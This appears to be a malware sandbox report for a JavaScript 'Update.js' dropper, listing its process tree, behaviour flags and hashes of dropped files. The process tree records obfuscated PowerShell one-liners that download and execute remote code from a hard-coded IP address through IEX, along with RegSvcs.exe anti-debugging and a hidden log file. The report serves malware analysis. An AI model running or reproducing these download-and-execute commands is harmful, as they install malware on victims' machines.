C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:6036
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://77.221.151.31/a/s.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5288
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Update (2).zip\Update.js"1⤵
- Checks computer location settings
PID:5856 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://77.221.151.31/a/z.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5728 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\Public\0x.log3⤵PID:4548
-
C:\Windows\system32\attrib.exeattrib +h C:\Users\Public\0x.log4⤵
- Views/modifies file attributes
PID:5044
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3872
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://77.221.151.31/a/s.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5504
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SDRSVC1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3024
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 3KB
MD5: 556084f2c6d459c116a69d6fedcc4105
SHA1: 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256: 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512: 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Filesize: 152B
MD5: 7b56675b54840d86d49bde5a1ff8af6a
SHA1: fe70a1b85f88d60f3ba9fc7bb5f81fc41e150811
SHA256: 86af7213f410df65d0937f4331f783160f30eaeb088e28a9eef461713b9a3929
SHA512: 11fc61b83365391efee8084de5c2af7e064f0182b943a0db08d95a0f450d3877bde5b5e6a6b9f008e58b709bb1a34f7b50085c41927f091df1eea78f039402e9

Filesize: 152B
MD5: 48cff1baabb24706967de3b0d6869906
SHA1: b0cd54f587cd4c88e60556347930cb76991e6734
SHA256: f6b5fbc610a71b3914753feb2bd4475a7c77d0d785cc36255bf93b3fe3ccb775
SHA512: fd0c848f3f9de81aca81af999262f96ea4c1cd1d1f32d304f56c7382f3b1bb604e5fbe9f209ad6e4b38988d92357ef82e9668806d0727f2856c7dc1f07aae2b6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\1f42c0ae-69dc-4fb4-bfad-db6b36bdb54b.tmp
Filesize: 873B
MD5: b5bf597a809a73b4dd06d80a8cf02af3
SHA1: a998a4b3f92e08d054d8910669579c7e955974fc
SHA256: bd70c238b1095cc0a4f259ce93cb1dd2de697ab19e3d37b179d2fb2fd76b4916
SHA512: 85d2650b27c7050f8b7c91dec73c5ca486c501e7492a9a26b5d1da5fa512506f112fcd656cbea0c10e9077814a4b47cafef59a747543bbba237560a7b18fc2bd

Filesize: 462KB
MD5: 66167a26e962ff6a29786ad80cd5b3a2
SHA1: 531a3516e5d3900be028f75661a0ee378d34afcb
SHA256: 1d1b567d8db866c98ce2b47f2327256dd927163fd966892046076368d0c46782
SHA512: 46483298ec3bc00035e31fce80b53429da8fc0cb07cf10d1dd3afa170ee70a49ea6ea01d6224534c4572487ed16df390e3dfdacf3a0715dc043a181de6882654

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize: 1KB
MD5: da0f1e93d39c3f1712a77903a16fc6a8
SHA1: fc6941dbe0436f4b509fa5748ad97dc35234d617
SHA256: 8ed3dd45da029cfef284aca7dd6dd16714a472b4ef1cd2a00c69a692eb3ee0b8
SHA512: 8c8849c90f396bcee520a7df5b5b614cf7ca5a2b5645594a9cd4d481420e04d476ecc78b363459033f7f6d95b5f164fead723a17cb38bb71c2fe7d3158939971

Filesize: 111B
MD5: 807419ca9a4734feaf8d8563a003b048
SHA1: a723c7d60a65886ffa068711f1e900ccc85922a6
SHA256: aa10bf07b0d265bed28f2a475f3564d8ddb5e4d4ffee0ab6f3a0cc564907b631
SHA512: f10d496ae75db5ba412bd9f17bf0c7da7632db92a3fabf7f24071e40f5759c6a875ad8f3a72bad149da58b3da3b816077df125d0d9f3544adba68c66353d206c

Filesize: 2KB
MD5: f835a94b8b933b77c1943d8979d421e7
SHA1: edcc3006c93f8bb20446fcc7105e7ae10059d478
SHA256: 981bf9c7e46f1294c615c472eb8241ba9f76ce1130fe95f9bb13cc49d0e9646b
SHA512: 0c5e665984784ad966fd6db498193dc1d79b9166d7737cb4238895b337e4b5b9701cb29c44d3164b350cabdf3b4c5fc4dea61e2c2bdb53788c0e41bf3734d349

Filesize: 1KB
MD5: 4ece273a3a61af2dcd57205ddc6c68fb
SHA1: 9f32b3a22e336f8919120b7a643be904efd6bc19
SHA256: f5831ca64855b651f21142ab70cbe7e51c0fecdf36dfff2f88c8a185cf39f709
SHA512: e14becf4430fc128bfc6a63150644c0ca48a2f22f24442e662b6e284e24027d52f62ebdaa13f09f08edbf16b8f660abd0de4304a1b3f58637f77145026cccf74

Filesize: 6KB
MD5: 1a04ccb41b55884ac4a441b25886e03a
SHA1: 9bfee580bf49266b104ff50c95d81c913197f7f6
SHA256: debb66b24fb5847591fbd6ab9e66bc829c3659ebe7f1520aca098f1a619547a5
SHA512: 9781e2a455e790e7a839371eda2bfc89b7bc0fdd55d6ef86b002ff7e19a9df3729c4ac254e0a043d108be16ffaac90885750d34e8bfb04df435998620cbeba2d

Filesize: 7KB
MD5: 705c8b6639c1f1b2106598c64fdb6cc1
SHA1: 52e9a9650742b531b06249654898ccf046c9bddb
SHA256: a715d8094c6758b038feee4517be54ba4c36780d2cdd609eedacb41b79035bb7
SHA512: 232f4d5c6756e775b3f05e7876fc30cec0f18a4e9788d4e2cb9a554a0f1283dd2fab3fd4a6732d88f02b492da5db3e185cdf792f8aea50a6c052f0b14b94887a

Filesize: 7KB
MD5: 88ff9abf96a1dbd8ef009a0c65805ef6
SHA1: a01214270b2b20971b8d5d868a3ca3b3c89d312d
SHA256: 3efb9ad4cc3659b80f50aa8341418ade988669d0170acb0b0e9ace5e4adebf1c
SHA512: ac6a56a959e742f0db7818715460af3e80af08cbb24726df5d4537dc54cbffe3778fd70ff36366705b113e6309f7cb43022b9d89bc265fd93aecb895d3426ab3

Filesize: 7KB
MD5: 77f16172929e65834619b0e3b5f9b8f2
SHA1: 2464e140ccf8e0d40debee5d872d21797074a5ef
SHA256: ce6e6029b3e4269649efac715e48d65ec6f9d5f7c8a6f2f39e8aecbe48d3f35b
SHA512: 2b5f72bd346e1dd539d18a343513ff37a242af98eff66245f9cc2fa485fb8f3f534570c351c4a56d78cfa318486bb5e74f1a798a9b1b4a095e5aa89b2496c2b8

Filesize: 873B
MD5: abe1016acaaad4fa17266c71d6d941a7
SHA1: aa359988b62bf16aad6c54861500e2f25cbe1c7a
SHA256: a4d7859af0c7128f856b7f8618339f58ef679ac32d2063971b99babb06bd0575
SHA512: 53270f696f4dc35323d1462389543d7f3229cf5fba4b8615cf7cedf41fae8446276ca3c16b27ae7a5a4f8ee864fcdd0f3de52f1248324a3550fc078063c06817

Filesize: 873B
MD5: c733007e5777311878f78b5ec6bc4f2b
SHA1: 31cb2e62059d3fd85ba13d1bc283b742ede51cb9
SHA256: ba063dc1fa885e39d869782a4cc773598699e8bfd622209dbe3c5476db77e3a7
SHA512: d60356aef9e5a77a5587dffaf54a9f47d28fa194b2acd667012c03b991704e3b3c9f516c5466198e926a1c2dc315f342c3525a6cfcf71e6006ef14716f9cf1a5

Filesize: 869B
MD5: 53c87b783385ed0b7e047b49c14970e8
SHA1: 06b770e07b84622116841255971cea6bf61f5ff4
SHA256: 4ec599b540ba7fa2b36e44f5a8a7abe986f7680dcc81d9b0d198fb6b16830479
SHA512: 85ea933f212c3ad25caab15cdc9d5fbfc18e714a05d4bf0d83f4c00009e70bc2a4bbcedd1037aeb321fa987d954ec39b5f224dcbea83bfc409326bd96d530bf9

Filesize: 873B
MD5: daea821e0ce172a35f2fd34604a234c8
SHA1: 1c855344624e3de6f6a7749440d95f4613562b4e
SHA256: ad7742d04355e3e2d05199a4279033a5fa8ec158008ee0ba8dbc4280c3a74d93
SHA512: 82b348956310ff0fa004b81a64f73cf6aa9527556c6b2ce004783dca9b2cbfc43442183ea06b1f37c21634ff2094690fe69d51932028ed4818908459d51bef2a

Filesize: 16B
MD5: 6752a1d65b201c13b62ea44016eb221f
SHA1: 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256: 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512: 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Filesize: 11KB
MD5: e15d845fde553c9491542d27b54c4e39
SHA1: 2d4abd059a510a66101746f6ec02651e3aaf4647
SHA256: 107cfd1f542839d0449a37486d52a30e8c7e90085e840434e61b4ff86856e47f
SHA512: ee21c605bb2e07d4f9293dd3daf50da436047e2918e18a08f61445015c83516a08379d7451d8943c04081e0b20f66b42c0315f32275bda584a93bd2f9da13761

Filesize: 11KB
MD5: dd01f7d37213ac27a30e690cf896a746
SHA1: 73f33680507cb8e38b6d724a675634ab56690159
SHA256: cf9265dc01912c3a6086a30fe8ada35cd466c04f2d6ca11bbeb7a95edcd4205e
SHA512: 24a68bca34100734cb1e224626c85360f7842b15a979432231f638a3e281b3b44cbfdec7dc276663e26afa865ff52230867aabac83ee615c7458e69b68ff0ee5

Filesize: 12KB
MD5: 06288814cceb3e209cd8c775ac4c1095
SHA1: 95efa4811bdc1a8bd5570b12ee11e93c9893f319
SHA256: 09c8bb04491efe7a8acb04b20155f8d00f6056a8ba08cc0f9a86412e6aa0e98c
SHA512: 0b7bd7d700455e14801ad4d4f8664abda4a3bf5241ae97b69e677fad40487eb5136b056e0adca37f8e5a59cfd35a99805af8ca74740074ffb6913ca54cc020d2

Filesize: 1KB
MD5: 6b7ac01e198a7605eb839bc9d0f82892
SHA1: 1745825f055a97a44a877ce22b772709bdfafe0a
SHA256: bd6de323224adb57779eea57fe6817dea350d402161165a7a203540b5d98ee34
SHA512: cfab4ce52e0634e216945d6d54bb1801c9cda03a4c6e01881f044218ccd1383daa962fc7f5d83a910fb6ee89dcb4cfd310db706394ea4b6dac8b1870f1755a14

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 62KB
MD5: d2e9de8671fd61605ff5f8b8f3249d6b
SHA1: 38dc0accb9c561c4f2ed9cc565f73a09eb84e81c
SHA256: fcdaa801a02c05faa8e09a1abb75ab4b8b4a57e1d097cc5feb63b95280230e5c
SHA512: 413abbf5eb1a19fec41bbf31cfa524a8c88f049ae624c2b8f8cd40b3dc6ca37b99a45e74cfcb3422bee104e218ebc6b3d38f22b5b9afbd967545aa862b15a106